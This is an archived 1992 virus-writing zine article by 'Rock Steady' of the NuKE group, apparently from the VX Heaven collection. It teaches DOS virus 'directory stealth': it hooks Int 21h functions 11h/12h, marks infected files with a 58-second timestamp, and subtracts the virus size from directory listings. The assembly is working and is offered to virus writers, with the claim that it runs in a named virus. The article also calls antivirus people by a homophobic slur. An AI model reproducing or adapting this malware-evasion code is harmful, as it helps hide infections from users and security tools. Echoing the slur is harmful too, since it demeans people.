Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Directory Stealth

Rock Steady
Nuke Info Journal [4]
August 1992

[Back to index] [Comments]

Stealth Viruses are the Viruses that I must admit Anti-Viral Queers Don't tend to like at all. Emagine if we added a polymorphic feature into the Stealth Virus? But, if you want to Continue Writing Viruses you have to make them Stealth. MS-DOS Version 6.0 Now comes with Virus Scanners and CRC & Checksum Checkers. In order to stop many viruses, But it will NEVER stop the `Stealth' Virus that is SMART of those AV features!

People think that there is ALOT of more INFECTED PCs since the virus threat, started in 1986-7. Even though in the beginning only 10 or so viruses were known, they Infected more systems, Compared to the viruses today, where we have about 1300 and growing. But the truth is LESS PCs are getting infect now, as people are now Virus Aware. With all the utilities out, any joker can stop and clean a virus in seconds. Come on, how many people MEMORIZED COMMAND.COM size? Out of my head its 47845 (MS-Dos V5.0). A simple increase of size tells me I got a problem.

A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth feature. That will NOT show you the INCREASE of file size, when the virus infects it. I have played with a few routines as such. I have tried reducing the File size in the FAT area, which results in the famous CHKDSK error reports of Loss Sectors, or Cross Links... And fixing them with CHKDSK will result in damaging the file for good.

What can we do? How about reducing the File size Right AFTER its read by DOS or any Utilities and right BEFORE its display on the screen! Yeah that's an Idea, Here's how to go about it...

Theory

First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h function 11h & 12h is called! If you don't know how to Hook Interrupts Read RESIDENT VIRIIs Article in this NewsLetter.

   Int21_Handler:
          cmp     ah,11h                  ;Is a DOS `Dir' being done?
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'
          cmp     ah,12h                  ;Is a DOR `Dir' Being done?
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'

  Int21Call:
          jmp     dword ptr cs:[Int21]    ;Or Else Goto ORIGINAL Int 21h
          ret                             ;Is need for the CALL of below

That's all that is needed in your Int21_Handler. Ofcourse if you are infecting file that are being Execute you add it ABOVE! Anyhow lets Explain the `DIR_STEALTH'

OffsetSizeDescription
Normal FCB
00h 1Drive Number 00=current drive 01=A,02=B,03=C etc..
01h 8Filename. Unused Spaces padded with Blanks
09h 3Extension of Filename.
0Ch 2Current block. points to block of records
0Eh 2Record Size.
10h 4FileSize in Bytes. (Low-order first, then high-order)
14h 2Date of Last Write. YY-MM-DD into bits YYYY-YYYM-MMMD-DDDD
16h 2Time of Last Write. HH:MM:SS into bits HHHH-HMMM-MMMS-SSSS
18h 4Reserved
*1Ch4SAME `10h' but THIS FILESIZE gets printed on Screen!
20h 1Offset of current record
21h 4Relative Record
Extended FCB
-07h1ALWAYS FFh tells use this is an Extended FCB
-06h5Reserved for DOS
-01h1Attribute Byte

* = Field Changed by virus.

Extended FCB: Are Identical to the Normal FCB but, it has three new fields totalling 7 bytes. (That is why we add y to BX) The additional 7 bytes are added to the BEGINNING!

So if we have an Extended FCB the first Byte will be FFh simply INC it and if its ZERO you got a Extended FCB! You can also CMP ES:[BX],FFh but that takes too many Bytes! Be COMPACT!!!

Algorithms

CONDISTION: After calling Function 11h/12h (Int 21h) it will search with the contents in the FCB. (*.*) which the DS:DX registers point to the FCB. If successful it will DUPLICATE the specified of the FCB in the current DTA (Disk Transfer Area) And basically we will EDIT the info in the DTA!

NOTE: Just because we are using the DTA doesn't mean this will work for function 4Eh/4Fh (Int 21h) that uses the DTA and ASCIIZ strings to search, that is a different procedure, though somewhat the same as this one. See Method #2, for that.

Step 1. We call the Int 21h so we may have the results to play with BEFORE DOS displays them on screen.

Step 2. Get the Current PSP, As the FCB is located inside the PSP in COM files its CS:0000 - CS:00FF. But in EXEs it can be anywhere, Int21h/AH=51 (Undocemented) will do this for us.

Step 3. Unmask the seconds (see if its infected) Quit if NOT

Step 4. Get the current DTA

Step 5. Test if it is Either an Extended FCB or Normal! If Extended Simple add 7h to the Address. (As Extended only have 7 bytes extra in the begining)

Step 6. Minus File size from the DTA! & Restore Time Back

 ; Here it is... Method #1

   dir_stealth:
          pushf                   ;Fake an INT Call
          push    cs              ;Needed to return back HERE! (Virus)
          call    Int21Call       ;Call the interrupt (See `Int21_Handler')
          test    al,al           ;AL=00h if successful
          jnz     no_good         ;Not Successful. Errors Eg:No More Files

          push    ax
          push    bx      ;Save them since they will be used! So when
          push    es      ;We exit all is restored to as Before!
          mov     ah,51h  ;(Undocmented) Gets the Current PSP and puts
          int     21h     ;it into BX

          mov     es,bx         ;ES now has PSP segment Address
          cmp     bx,es:[16h]   ;Did we open a Good PSP?
          jnz     exit_man      ;No, PSP unavailable, Exit Dude
          mov     bx,dx         ;BX now points to the Original FCB in PSP
          mov     al,[bx]       ;AL now has the current drive
          push    ax            ;Save it to tell if its an Extended FCB
          mov     ah,2fh        ;Get DTA (Disk Transfer Address)
          int     21h
  ;Also before we start fiddling around we must know if we are working with
  ;And EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended
  ;Has three fields appended to the normal one... (Above)

          pop     ax            ; AL = FFh if Extended FCB or else Drive #
          inc     al            ; Will tell us if we have an Extended FCB
          jnz     fcb_ok        ; No, We don't continue as normal
          add     bx,7h         ; Yes, we do, add 7h to BX pointer
  fcb_ok: mov     ax,es:[bx+17h]  ;Gets Seconds Field
          and     ax,1fh          ;Unmask to have SECONDS only
          xor     al,1dh          ;is it 58 seconds? (1d * 2)
          jnz     not_infected    ;Nope, okay its not infected
          and     byte ptr es:[bx+17h],0e0h   ;Restores seconds
          sub     es:[bx+1dh],virus_size      ;Subtract FileSize with Virii
          sbb     es:[bx+1fh],ax              ;Needed to fix up Bytes with
  not_infected:                               ;Borrowing
          pop     es              ;Ciao, Ciao
          pop     bx
          pop     ax
  no_good:iret             ;Pretend you came back from an Interrupt call!
  ;----------------------------The EnD-------------------------------------
                          Rock Steady / NuKE
                 `Feed my Frankenstein', Alice Cooper

NOTE: This Code Works, Look at NuKE PoX V1.1 to see it...

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua